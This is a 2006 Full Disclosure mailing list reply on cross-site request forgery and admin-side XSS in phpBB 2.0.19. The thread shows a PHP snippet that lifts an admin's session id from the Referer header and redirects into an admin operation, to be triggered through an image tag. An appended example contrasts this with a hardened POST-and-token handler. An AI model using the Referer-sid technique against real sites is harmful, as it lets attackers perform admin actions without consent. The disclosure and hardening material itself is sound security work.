Full Disclosure mailing list archives
RE: phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin
From: Maksymilian Arciemowicz <max () jestsuper pl>
Date: Fri, 3 Feb 2006 15:22:40 +0100
From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com>

> 1. Basically all phpBB admin-side options do allow full HTML, including javascript. That is the intended behaviour, as there are legitimate uses. phpBB does however check the Session ID before allowing the changes to go to the database. Your exploit needs a valid admin session key and you need to get the admin to visit the page (unless you happen to have a lot of luck with your IP) - be it by a link or a reflecting page. And even then, it will only work when the admin has logged into the ACP prior to running into the trap.
    $sid = array();
    // the session id is recovered from the Referer header
    preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
    if (!empty($sid[1])) {
        // the redirect carries the recovered sid into the operation
        header("Location: " . $operation . "&sid=" . $sid[1]);
    }

If you have for example <IMG SRC="http://SOME.SCRIPT.PHP"> and you send the referer... (tested in IE, Mozilla etc.), then please check getenv('HTTP_REFERER'). The phpBB team was informed about these issues and they confirmed that these vulnerabilities exist in phpBB 2.0.19. The solution is to use POST for all operations.
> 2. That is a general problem with all pages allowing off-site pictures. It has been discussed on the list before. Most of your examples won't work with phpBB, due to the missing Session ID in the links.
--
pub 1024D/7FDF4CEE 2005-09-21
uid Maksymilian Arciemowicz (cXIb8O3) <max () jestsuper pl>
sub 2048g/AE816DB6 2005-09-21

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
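As an added example (not phpBB's code and not from the thread), the Referer-derived sid pattern discussed above is placed beside a hardened handler that accepts only POST, checks the sid against the caller's own session and verifies a session-bound token; the token name, the $session layout and the function names are assumptions.

```php
<?php
// Added example, not phpBB code: the Referer-derived sid pattern from the
// thread beside a hardened handler. $operation is the name used in the
// thread; the token name, $session layout and function names are assumed.

// Weak pattern as described in the thread: the session id is recovered from
// HTTP_REFERER and a state-changing action is then performed on a plain GET.
function weak_redirect(array $server, string $operation): ?string
{
    $sid = array();
    // Any page whose URL carries the admin's sid sends it here in the Referer.
    preg_match('#sid\=?([0-9a-z]*)#i', $server['HTTP_REFERER'] ?? '', $sid);
    if (!empty($sid[1])) {
        return $operation . '&sid=' . $sid[1];   // no token, no method check
    }
    return null;
}

// Hardened handler: POST only, sid compared against the caller's own session,
// and a per-session anti-CSRF token that a third-party page cannot know.
function hardened_check(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;      // an <img> or a plain link can only produce a GET
    }
    $sid   = $post['sid'] ?? null;
    $token = $post['csrf_token'] ?? null;
    if (!is_string($sid) || !is_string($token)) {
        return false;      // reject arrays (sid[]=...) and missing fields
    }
    // The sid must match the session the browser actually holds, never a
    // value copied out of a Referer or a query string.
    if (!isset($session['sid']) || !hash_equals($session['sid'], $sid)) {
        return false;
    }
    // Token generated server-side when the admin form was rendered and kept
    // in the session; a cross-site request cannot carry it.
    if (!isset($session['csrf_token']) || !hash_equals($session['csrf_token'], $token)) {
        return false;
    }
    return true;
}

// Constructed sample: a GET whose Referer leaks an admin sid is honoured by
// the weak path and rejected by the hardened one.
$server = ['REQUEST_METHOD' => 'GET',
           'HTTP_REFERER'   => 'http://forum.example/admin/index.php?sid=0123456789abcdef'];
var_dump(weak_redirect($server, 'admin_users.php?mode=edit'));
var_dump(hardened_check($server, [], ['sid' => '0123456789abcdef', 'csrf_token' => 'deadbeef']));
```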